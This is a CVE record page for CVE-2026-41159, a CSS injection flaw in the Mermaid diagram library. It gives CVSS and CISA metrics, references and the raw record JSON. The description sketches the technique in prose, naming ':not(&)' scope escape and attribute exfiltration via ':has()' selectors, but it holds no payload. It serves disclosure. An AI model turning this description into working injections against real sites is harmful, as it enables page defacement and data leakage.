CVE-2026-41159 (GCVE-0-2026-41159)
Vulnerability from cvelistv5 – Published: 2026-05-29 13:53 – Updated: 2026-05-29 15:02
VLAI
Title
Mermaid: Improper sanitization of configuration leads to CSS injection
Summary
Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis's & (scope reference) handling. :not(&) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0.
Severity
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/mermaid-js/mermaid/security/ad… | x_refsource_CONFIRM |
| https://github.com/mermaid-js/mermaid/commit/6476… | x_refsource_MISC |
| https://github.com/mermaid-js/mermaid/releases/ta… | x_refsource_MISC |
| https://github.com/mermaid-js/mermaid/releases/ta… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| mermaid-js | mermaid |
Affected:
>= 11.0.0-alpha.1, < 11.15.0
Affected: < 10.9.6 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-41159",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T15:02:42.708368Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T15:02:56.459Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "mermaid",
"vendor": "mermaid-js",
"versions": [
{
"status": "affected",
"version": "\u003e= 11.0.0-alpha.1, \u003c 11.15.0"
},
{
"status": "affected",
"version": "\u003c 10.9.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid\u0027s default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis\u0027s \u0026 (scope reference) handling. :not(\u0026) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T13:53:10.148Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p"
},
{
"name": "https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76"
},
{
"name": "https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0"
},
{
"name": "https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6"
}
],
"source": {
"advisory": "GHSA-87f9-hvmw-gh4p",
"discovery": "UNKNOWN"
},
"title": "Mermaid: Improper sanitization of configuration leads to CSS injection"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41159",
"datePublished": "2026-05-29T13:53:10.148Z",
"dateReserved": "2026-04-17T16:34:45.524Z",
"dateUpdated": "2026-05-29T15:02:56.459Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-41159\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-29T15:16:22.813\",\"lastModified\":\"2026-05-29T16:25:57.843\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid\u0027s default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis\u0027s \u0026 (scope reference) handling. :not(\u0026) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"LOW\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41159\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-29T15:02:42.708368Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-29T15:02:48.026Z\"}}], \"cna\": {\"title\": \"Mermaid: Improper sanitization of configuration leads to CSS injection\", \"source\": {\"advisory\": \"GHSA-87f9-hvmw-gh4p\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"LOW\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"mermaid-js\", \"product\": \"mermaid\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 11.0.0-alpha.1, \u003c 11.15.0\"}, {\"status\": \"affected\", \"version\": \"\u003c 10.9.6\"}]}], \"references\": [{\"url\": \"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p\", \"name\": \"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76\", \"name\": \"https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0\", \"name\": \"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6\", \"name\": \"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid\u0027s default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis\u0027s \u0026 (scope reference) handling. :not(\u0026) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-29T13:53:10.148Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-41159\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-29T15:02:56.459Z\", \"dateReserved\": \"2026-04-17T16:34:45.524Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-29T13:53:10.148Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…